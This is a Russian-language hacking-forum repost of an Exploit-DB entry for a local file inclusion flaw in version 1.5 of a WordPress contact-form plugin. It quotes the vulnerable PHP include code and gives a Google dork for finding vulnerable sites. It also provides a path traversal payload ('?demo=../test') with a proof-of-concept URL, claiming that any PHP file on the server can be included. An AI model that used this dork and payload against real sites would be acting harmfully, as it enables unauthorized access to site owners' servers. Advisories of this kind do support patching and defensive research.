Exploit WordPress Plugin N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36952
Проверка EDB
  1. Пройдено
Автор
T3N38R15
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2015-05-08
WordPress Plugin N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion
Код:
# Exploit Title: website contact form with file upload 1.5 Exploit Local File Inclusion
# Google Dork: inurl:"/plugins//website-contact-form-with-file-upload/"
# Date: 07.05.2015
# Exploit Author: T3N38R15
# Software Link: https://wordpress.org/plugins/website-contact-form-with-file-upload/
# Version: 1.5
# Tested on: Windows/Linux

The affected file is /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php
it include the file /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/helpers/demo.php
and at the line 23-26 are the inclusion.


			$file = LIB_PATH . '/filters/' . $name . '.php';
			if (!file_exists($file))
				throw new Exception("Invalid demo: {$name}");
			include($file);


The exploit can be used like that : /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test
This version would include the test.php file in the same directory because we need to back navigate from the directory ./filters/../test.php
Now we can include all php files on the system.

Proof of concept : http://localhost/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test

Greets to Team Madleets/leets.pro
Regards T3N38R15
 
Источник
www.exploit-db.com

Похожие темы